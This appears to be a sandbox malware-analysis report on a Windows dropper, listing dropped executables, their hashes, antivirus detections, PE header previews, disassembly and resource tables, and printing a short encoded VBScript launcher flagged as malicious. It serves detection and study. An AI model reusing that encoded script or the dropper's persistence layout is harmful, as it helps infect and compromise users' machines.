                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):68
                Entropy (8bit):5.149603466091263
                Encrypted:false
                SSDEEP:3:KhIZyAeeAzAtcfAymcvuXIa:KhIZtAsqf7vuXl
                MD5:A6AE8E961055E434C1499682923AB440
                SHA1:EE46AC5F9C1C38A50EB727CCF14C0415AA2D7148
                SHA-256:61B8E293DAD869BACF014BD201CA13B0EFC6144E8D2B6675FFD58342DFAD43E1
                SHA-512:23E90AB12AFDC8C04B9F85DCD79C4CD28C6C777377A09E190B9C4D757D947B7176F78903649140B9CDD7DF7FB868463CA701C08846E0FFE9C8BC56B8DCC6F61E
                Malicious:false
                Preview:FN1FaFCMFIHxk1eFNMkh2jhEeVWBqbeJNeguDgzrLqs0ZmWUXWC9JRKgqwlFsBgon7jG
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (535), with no line terminators
                Category:dropped
                Size (bytes):535
                Entropy (8bit):5.869832689957653
                Encrypted:false
                SSDEEP:12:tCuyQwzwqaD625CzGjVibQl5broI+y2rMbWJiP+ge6AITzq2vKy:trGSp5Cz0VYQlh8IAMOe+geRuXKy
                MD5:5A618C519E94FC726840466394CB1B9B
                SHA1:531CBAA9BE90C731463BDC561445D6B774B72E36
                SHA-256:470C82043E01132AA0E3C4C082EC681364234C89B18E3954CED5546E88BF84CF
                SHA-512:CA0F6FA1DE7D98599BC18738E7C7B46F507C4B9BD216A101093DEA085D62CE1779B91EBB4F2746EDF2663414F43919D2738E661E3C1D449535050A23C8AD0383
                Malicious:false
                Preview:IonPpsQpK4ctbxssOteOEMZciHl55grcXIz0Ma0copEuPKFz4Y132cc5PKqiHUtnNAWT72fy3BjZIoNYBwBhpyk5q4lCuSVU6ahPyw1C2D902Cwl7SgVSL8ZZbmDQdDlqPdsG7jP49olytCnHAEbv9BubHzXJxvY9YKnjEe9sQaThXlqY85QZmzqNtQ9IMGHOPlZjZECfFsejrMEgJ8L2e9XidZ0yf1gKTFRvLG842uU3VGfgLc9N4OtPN0FANOANMTQm5SUC9R9tpeNW3UmC2SQEWBiVA8qouGqC03l2I6OnP9ktntG3l7V3DLQ3u9BAkV8jxKg9su45EnyWbyrR1wCxuw9onsIJ5NC4AB5cNHK1CazZX3b5RtJySLyAL1WAlv91k4Va3PEumLuU7jRtQM1LDOlzM4QVvJPRa7zchBCCpYLHbeDmjmuZ3yxWSgN88s9c5c39tzMOJzgpCeYs0ovJZzYmKcJAyDE6ZtL8kE2uZgPDSITxIfIT70DGERzQpLaGvjQSTZHwvAt2kUTCIW
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):103
                Entropy (8bit):5.37710226076945
                Encrypted:false
                SSDEEP:3:w3NpyZHDWG1ssBuSc9jpTdNoUyjUtIRpQwr:w9pyZH71nBmVwU+Rplr
                MD5:B7A937B716ACF18EDE37C8FA77CEA757
                SHA1:0FE7EE29FDF8A763ED763204B55CB4527FA0B029
                SHA-256:F15AC923EF83228D7C3D305F7294F097A52E10D2F7FC8793E61046BA5EBB20B4
                SHA-512:183FAB854DB7FC03EC7D61FC726CBFA653F051D1F7CE893C73B9834028235CBAF1D767FF363D13B1DE8FFCB1426F1A754D485872CD56862708A16256FDDD4CA5
                Malicious:false
                Preview:JSs1BdsYVh6HKgt7wHSTHLAkrmOfxhK4exbBkKH2J4kMCbgiKWcdx587SIKYONkxXBmXFrWmAaJMkxhPGqUbFqHjydtcAtn5UxzBzJd
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1740
                Entropy (8bit):5.36827240602657
                Encrypted:false
                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
                MD5:B28E0CCD25623D173B2EB29F3A99B9DD
                SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
                SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
                SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (985), with no line terminators
                Category:dropped
                Size (bytes):985
                Entropy (8bit):5.896550841028341
                Encrypted:false
                SSDEEP:24:w5eumDRS2Ukh03IC/3vTMAgyLuGOW7YIzuOUGa2muxT:wodNPUkh03IQ/2yLuUYIzueFmmT
                MD5:2E13F34C7DC4B110B02CE8FFEA525CC3
                SHA1:6CE651AFD031CDD49719D7A68E8A1ABFC312CD50
                SHA-256:D613D030A0BE78A83B4A0C33CBB8D0E681EFA408B699E071DBF94FB83A168945
                SHA-512:26C7751B925985FC0E0DE8F86AED7768A893AF2DEAEE303BC1D2F759CADA92F56B6BB87A36B1C71D760FDB83A2AEB86CF46B9F0D3FB1229E2DECA9F9C2D482C2
                Malicious:false
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (660), with no line terminators
                Category:dropped
                Size (bytes):660
                Entropy (8bit):5.914053342691167
                Encrypted:false
                SSDEEP:12:Zi3OxXOEv10vJG1/TsT+MTRPUv5G6FRnbIrmzxhYQcJhXtM5ScZ2DmE:A3ORv1nc+Md25fFJNSQcJBtG2DH
                MD5:BAD7727817013BE56010728019822593
                SHA1:2C29B00AB29AAA2E2A7BAF4DD9171F3A91234AC1
                SHA-256:E377322FD66D88F48ACA272EB50F82F3CF33CC01519ADF08E2C443A82A05CC61
                SHA-512:6BE86A84E5071B858E5F5154F050EE6A5E6201001F7BFAB2BAD40AACB5B6F0EB10C644AD60B43E0D04DA65CA66C078BC5077694C2FAAD22D94CC6EC862BDF3C7
                Malicious:false
                Process:C:\Users\user\Desktop\DFpUKTL6kg.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):34
                Entropy (8bit):4.2639334294856335
                Encrypted:false
                SSDEEP:3:I50+A553fkAH:I6x58AH
                MD5:C4D1668093627B8BAD684C203127AEA0
                SHA1:6671BC621C55E507B9D04B2574EDF61E392D07CE
                SHA-256:71F60ECEED543DE69425208D9DB31D0D5B371792329D7BA45BA384B0327B7C38
                SHA-512:26CB1B5620D4DA7B5E39E2ED7010BCD85C1087E9079214A6C2A41C84805FF67D0CE923EE76EF3C444BA2E944DC3F19AE6DD271F399C425AAC5EC8C85EDB632A2
                Malicious:false
                Preview:"C:\chainSurrogate\browsersvc.exe"
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\DFpUKTL6kg.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\DFpUKTL6kg.exe
                File Type:data
                Category:dropped
                Size (bytes):217
                Entropy (8bit):5.785913358013251
                Encrypted:false
                SSDEEP:6:GmvwqK+NkLzWbHE08nZNDd3RL1wQJRe1Rd//7GAFNY7s:G1MCzWLE04d3XBJQDDGAXY7s
                MD5:EE3A4B8D5B9A45AC52FAB507FCDDB2AE
                SHA1:101A1A475BE56C7924374353A9B60D914C0A64F0
                SHA-256:C18B8C22ABE6C0333B1C9A7E7096F8530B9C75213791DF17C67B1DCD609F86C7
                SHA-512:95D9C4FEE2B2760E0CF10EB03D69E48AE8B730B1096756D81D4DCDCACB5DA88642836FF2C52D64216F3FB0E87CBC611F4F4EE1EC8E46746A38EF2CA1151049B2
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Preview:#@~^wAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v,T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJm4mk.?EMDKLlD+&9}E^60WVTOhRx|dt6,`ry+jHC)c4CYrSPZ~~WmV/nUz0AAA==^#~@.
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.372055712987412
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.97%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:DFpUKTL6kg.exe
                File size:1'164'929 bytes
                MD5:23a1767d4e77693bd46f3abfcf10e4d7
                SHA1:1be797ac1e5180f8bb51b359b7c8dc88daf2732e
                SHA256:d675f72b0bc010f74a28dfb3401dd69dbae5d21a55624a827fa70d1041367d13
                SHA512:c5cc36fde16459b113165f0269f72bdbe92fcb2695399569e504d6c70f5bc8037b0f7e0cc5d9bb8b1159ead680e2519e7f9081e45d4bc4e92f4508e13d41601d
                SSDEEP:24576:U2G/nvxW3Ww0tpQfgeUO7llNndNogBuHtz4s:UbA30pQZ7tdmh
                TLSH:67454A017E448A11F0191633C2EF450487B4AD526BA6E71F7EBA376E65223B37D1CACB
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                Icon Hash:1515d4d4442f2d2d
                Entrypoint:0x41ec40
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                Instruction
                call 00007F68D8B9D719h
                jmp 00007F68D8B9D12Dh
                cmp ecx, dword ptr [0043E668h]
                jne 00007F68D8B9D2A5h
                ret
                jmp 00007F68D8B9D89Eh
                int3
                int3
                int3
                int3
                int3
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007F68D8B90037h
                mov dword ptr [esi], 00435580h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 00435588h
                mov dword ptr [ecx], 00435580h
                ret
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 00435568h
                push eax
                call 00007F68D8BA043Dh
                pop ecx
                ret
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F68D8B8FFCEh
                push 0043B704h
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F68D8B9FB52h
                int3
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F68D8B9D244h
                push 0043B91Ch
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F68D8B9FB35h
                int3
                jmp 00007F68D8BA1B83h
                jmp dword ptr [00433260h]
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                push 00421EB0h
                push dword ptr fs:[00000000h]
                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [C++] VS2015 UPD3.1 build 24215
                • [EXP] VS2015 UPD3.1 build 24215
                • [RES] VS2015 UPD3 build 24213
                • [LNK] VS2015 UPD3.1 build 24215
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xdfd0 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x2268 | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x63000 | 0xdfd0 | 0xe000 | f6c0f34fae6331b50a7ad2efc4bfefdb | False | 0.6370326450892857 | data | 6.6367506404157535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc | 0x71000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                PNG | 0x63650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                PNG | 0x64198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                RT_ICON | 0x65748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                RT_ICON | 0x65cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                RT_ICON | 0x66558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                RT_ICON | 0x67400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                RT_ICON | 0x67868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                RT_ICON | 0x68910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                RT_ICON | 0x6aeb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                RT_DIALOG | 0x6f588 | 0x286 | data | English | United States | 0.5092879256965944
                RT_DIALOG | 0x6f358 | 0x13a | data | English | United States | 0.60828025477707
                RT_DIALOG | 0x6f498 | 0xec | data | English | United States | 0.6991525423728814
                RT_DIALOG | 0x6f228 | 0x12e | data | English | United States | 0.5927152317880795
                RT_DIALOG | 0x6eef0 | 0x338 | data | English | United States | 0.45145631067961167
                RT_DIALOG | 0x6ec98 | 0x252 | data | English | United States | 0.5757575757575758
                RT_STRING | 0x6ff68 | 0x1e2 | data | English | United States | 0.3900414937759336
                RT_STRING | 0x70150 | 0x1cc | data | English | United States | 0.4282608695652174
                RT_STRING | 0x70320 | 0x1b8 | data | English | United States | 0.45681818181818185
                RT_STRING | 0x704d8 | 0x146 | data | English | United States | 0.5153374233128835
                RT_STRING | 0x70620 | 0x446 | data | English | United States | 0.340036563071298
                RT_STRING | 0x70a68 | 0x166 | data | English | United States | 0.49162011173184356
                RT_STRING | 0x70bd0 | 0x152 | data | English | United States | 0.5059171597633136
                RT_STRING | 0x70d28 | 0x10a | data | English | United States | 0.49624060150375937
                RT_STRING | 0x70e38 | 0xbc | data | English | United States | 0.6329787234042553
                RT_STRING | 0x70ef8 | 0xd6 | data | English | United States | 0.5747663551401869
                RT_GROUP_ICON | 0x6ec30 | 0x68 | data | English | United States | 0.7019230769230769
                RT_MANIFEST | 0x6f810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                DLL | Import
